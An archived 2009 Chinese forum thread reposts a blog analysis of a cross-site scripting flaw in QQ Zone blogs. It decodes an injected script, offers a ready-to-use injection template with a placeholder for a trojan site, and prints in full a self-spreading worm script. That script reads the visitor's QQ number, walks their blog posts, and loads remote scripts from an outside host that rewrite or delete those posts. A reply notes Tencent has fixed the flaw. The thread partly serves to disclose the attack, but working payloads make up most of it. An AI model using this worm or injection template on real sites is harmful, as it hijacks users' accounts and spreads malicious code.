【3.A.S.T】网络安全爱好者's Archiver

黑客学习

Ksnort 发表于 2009-4-26 21:06

QQ空间出现跨站漏洞疑有木马利用此漏洞

信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
文章作者:风雪残士 [url]http://blog.tkbbs.com[/url]
本文首发本人BLOG: [url]http://blog.tkbbs.com/article/48.htm[/url]
如果转载请注明作者与出处 谢谢
    前几天出现访问空间弹出广告 开始没怎么注意 后来经一位朋友说 看我一篇日志经常出现广告。 加上自己的经历。
   tkbbs_20090425173957_fxcs.jpg (146.08 KB)
[img]https://forum.eviloctal.com/attachments/month_0904/20090425_42006245019d9f8d9b20YqjJTz09HSyT.jpg[/img]

看了下源代码  发现有个共同处  一律有 [url]http://catche.qq.com/temp/20081209/4236888.swf[/url] 这个FLASH地址(访问不了) 而重要的在后面那段标记蓝色代码  经过简单的unicode加密 解码后为

程序代码

this.parentNode.style.display='none';if(!window.xxr){var l=document.createElement('script');l.src='http://love.avtupian.com/a/q/mq.jpg';l.type='text/javascript';document.getElementsByTagName('head').item(0).appendChild(l);window.xxr=1}
就是不知道到底是腾讯的问题 还是病毒自动提交的跨站代码  而腾讯空间有跨站漏洞是毋庸置疑的。

把http: //love.avtupian.com/a/q/mq.jpg下载过来用记事本打开 就可以发现恶意代码


空间日志特征是一个大小都为0的 FLASH 地址为 [url]http://catche.qq.com/temp/20081209/4236888.swf[/url]
只要重新编辑下 删掉FLASH 即可(不是转帖复制 手动打上去的文章也有此情况)

又访问了几位好友空间  以前发布的日志没这种情况  基本发生在最近3-4天前发布的日志  病毒代码不是每人都有

个人水平有限 无法确定究竟是腾讯空间出的问题还是病毒造成。 大量网民感染木马自动提交的一段代码

以下代码仅供测试 切勿用作非法用途
复制内容到剪贴板
代码:
[flash,0,0]http://随意地址/fxcs.swf[email=]id=baidu style=ee:expression(eval(unescape('this.parentNode.style.display%3D%27none%27%3Bif%28%21window.xxr%29%7Bvar%20l%3Ddocument.createElement%28%27script%27%29%3Bl.src%3D%27http%3A//木马网站地址/a/q/mq.jpg%27%3Bl.type%3D%27text/javascript%27%3Bdocument.getElementsByTagName%28%27head%27%29.item%280%29.appendChild%28l%29%3Bwindow.xxr%3D1%7D')));display:none;@qq.com[/email][/flash]
开头的FLASH 随便填  木马网站地址/a/q/mq.jpg 修正为木马路径。

搜索引擎查询
[url]http://www.baidu.com/s?tn=index8[/url] ... Aqq.com+4236888.swf
[url]http://www.baidu.com/s?tn=360se_[/url] ... 236888.swf&ct=0
[url]http://www.google.cn/search?hl=z[/url] ... a=&aq=f&oq=
由于查找不了源文件 搜索结果小的可怜  无法扩大搜索

这个漏洞应该有人早发现了  而且制作了程序实现编辑日志自动带一个 这么尾巴 由于FLASH大小为0 不注意就不会发现

mq.jpg 代码  (连接框架地址部分我修改了下 其他没变 现在网站访问不了 不知道原版是啥。。)
复制内容到剪贴板
代码:
function killErrors() {return true;}
window.onerror=killErrors;

var shendu;shendu=4;
//---------------global---v------------------------------------------
var visitorID;var userurl;var guest;var xhr;var targetblogurlid="0";
var myblogurl=new Array();var myblogid=new Array();
        var gurl=document.location.href;
        var gurle=gurl.indexOf("com/");
        gurl=gurl.substring(0,gurle+3);         
        var visitorID=top.document.documentElement.outerHTML;
           var cookieS=visitorID.indexOf("g_iLoginUin = ");
        visitorID=visitorID.substring(cookieS+14);
        cookieS=visitorID.indexOf(",");
        visitorID=visitorID.substring(0,cookieS);
        get_my_blog(visitorID);
        DOshuamy();
function DOshuamy(){
var ssr=document.getElementById("veryTitle");
ssr.insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://www.tkbbs.com/1.html'></iframe>");
}
//-----------------------------------------
function get_my_blog(visitorID){
   userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";
   xhr=createXMLHttpRequest();
   if(xhr){
     xhr.open("GET",userurl,false);
     xhr.send();guest=xhr.responseText;
     get_my_blogurl(guest);
    }
}

function get_my_blogurl(guest){
  var mybloglist=guest;
  var myurls;var blogids;var blogide;
  for(i=0;i<shendu;i++){
     myurls=mybloglist.indexOf('selectBlog(');
     if(myurls!=-1){
         mybloglist=mybloglist.substring(myurls+11);
         myurls=mybloglist.indexOf(')');
         myblogid[i]=mybloglist.substring(0,myurls);
        }else{break;}
}
get_my_testself();
}

function get_my_testself(){
  for(i=0;i<myblogid.length;i++){
      var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid[i]+"&r="+Math.random();
      var xhr2=createXMLHttpRequest();
      if(xhr2){
              xhr2.open("GET",url,false);     
              xhr2.send();
              guest2=xhr2.responseText;
              var mycheckit=guest2.indexOf("baidu");
              var mycheckmydoit=guest2.indexOf("mydoit");
              if(mycheckmydoit!="-1"){
                targetblogurlid=myblogid[i];
                add_jsdel(visitorID,targetblogurlid,gurl);
                break;
               }
              if(mycheckit=="-1"){
                targetblogurlid=myblogid[i];
                add_js(visitorID,targetblogurlid,gurl);
                break;
               }
        }      
}
}

//--------------------------------------  
function createXMLHttpRequest(){
    var XMLhttpObject=null;   
    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}   
    else   
      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];         
        for(var i=0;i<MSXML.length;i++)   
        {   
            try  
            {   
                XMLhttpObject=new ActiveXObject(MSXML[i]);   
                break;   
            }   
            catch (ex) {  
            }   
         }   
      }
return XMLhttpObject;
}  

function add_js(visitorID,targetblogurlid,gurl){
var s2=document.createElement('script');
s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/index.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();
s2.type='text/javascript';
document.getElementsByTagName('head').item(0).appendChild(s2);
}
function add_jsdel(visitorID,targetblogurlid,gurl){
var s2=document.createElement('script');
s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/del.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();
s2.type='text/javascript';
document.getElementsByTagName('head').item(0).appendChild(s2);
}

闲逛 发表于 2009-4-27 15:10

。。。已经被TX修复了。。。

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.